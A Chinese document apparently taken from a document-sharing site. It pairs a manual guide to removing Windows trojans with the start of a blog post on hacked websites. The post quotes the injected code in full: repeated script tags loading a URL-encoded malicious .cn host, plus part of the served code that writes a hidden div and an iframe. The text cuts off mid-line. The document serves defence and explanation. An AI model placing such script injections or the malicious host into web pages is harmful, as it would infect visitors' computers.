最简单系统木马病毒解决方法.docVIP

最简单的系统木马病毒解决方法系统中木马病毒后该怎么办？下面我们介绍一些简单的解决方法。 　　1.打开windows任务管理器，察看是否有可疑的进程(可以根据杀毒软件的报告或者在网上搜索相关信息来判定)在运行，如果有把它结束。注意在system32目录下的Rundll32.exe本身不是病毒，有可能一个dll文件在运行，他才可能是病毒或恶意程序之类的东西。 　　由于windows 任务管理器不能显示进程的路径，因此建议使用杀毒软件自带的进程察看和管理工具来查找并中止可疑进程。然后设法找到病毒程序文件(主要是你所中止的病毒进程文件，另外先在资源管理器的文件夹选项中，设置显示所有文件和文件夹、显示受保护的文件，再察看如system32文件夹中是否有不明dll或exe文件，C:\Program Files、C:\Documents and Settings\user\Local Settings\Temporary Internet Files、C:\Documents and Settings\user\Local Settings\Temp等处是否有不明文件或病毒程序文件)，然后删去，搞清楚是否是系统文件再动手。 　　2.有些病毒进程终止不了，提示“拒绝访问”，或者出现“屡禁不止”的情况。根据我的经验，有三种办法供尝试： 　　A.可能是某些木马病毒、流氓软件等注册为系统服务了。办法是：察看控制面板〉管理工具〉服务，看有没有与之相关的服务(特别是“描述”为空的)在运行，把它停止。再试著中止病毒进程并删除。 　　B.你可以尝试安全模式下(开机后按F8选安全模式)用杀毒软件处理，不行则再按步骤1和2A试一试。 　　C.使用冰刃等工具，察看病毒进程的线程信息和模块信息，尝试结束线程和解除模块，再试著删除病毒进程文件和相应的模块。(慎用) 　　3.如果稍微懂得注册表使用的，可以再把相关的注册表键值删除。一般方法：开始〉运行，输入regedit，确定，打开注册表编辑器。编辑〉查找，查找目标为病毒进程名，在搜索结果中将与之有关的键值删除。有时这样做不能遏止病毒，还应尝试使用步骤2中方法。 　　4.某些病毒会劫持IE浏览器，导致乱弹网页的状况。建议用360安全卫士，看浏览器辅助对象BHO是否有可疑项目，有没有没恶意插件或者木马。有就修复它。 　　5.其他提示：为了更好的操作，请先用优化大师或超级兔子清理所有临时文件和上网时的缓存文件。一般病毒往往在临时文件夹Temp中，这样做可以帮你更快找到病毒文件。 　　开始运行，输入msconfig，确定，可以打开“系统配置实用程序”。选择“启动”，察看开机时加载的程序，如果在其中发现病毒程序，可以禁止它在开机时加载。不过此法治标不治本，甚至对某些程序来说无效。还是要按步骤1、2办。2009-03-06 17:01 网站被挂木马解决方法 参考网站:/viewthread.php?tid=428347 还是挂马问题，这段时间，我渐渐感到压力，头大，通过QQ或MSN加我的人越来越多，我最近自己的工作本来就忙得不亦乐乎。哎，想想，还是要抽空来来帮一行代码解决iframe挂马（包含服务器端注入、客户端ARP注入等）》得到了很多朋友的认可，这确实是个避避风雨的好办法。可现在挂网马的方式真如我所料地改变了，现在流行挂script木马，汗了，看了几个网友的网站都被这样了——页面的顶部或底部加上了： 注意，以下地址含有木马，请不要轻易访问： script src=http://%76%63%63%64%2E%63%6E/scriptscript src=http://%76%63%63%64%2E%63%6E/scriptscript src=http://%76%63%63%64%2E%63%6E/scriptscript src=http://%76%63%63%64%2E%63%6E/scriptscript src=http://%76%63%63%64%2E%63%6E/scriptscript src=http://%76%63%63%64%2E%63%6E/scriptscript src=http://%76%63%63%64%2E%63%6E/scriptscript src=http://%76%63%63%64%2E%63%6E/script 汗死，一连插入了N个一样的script标记。偶的电脑什么补丁都打了，直接访问这个http://%76%63%63%64%2E%63%6E（或直接使用迅雷下载），额~　现形了： document.write(div style=display:none)document.write(iframe src=/b1.htm?id=0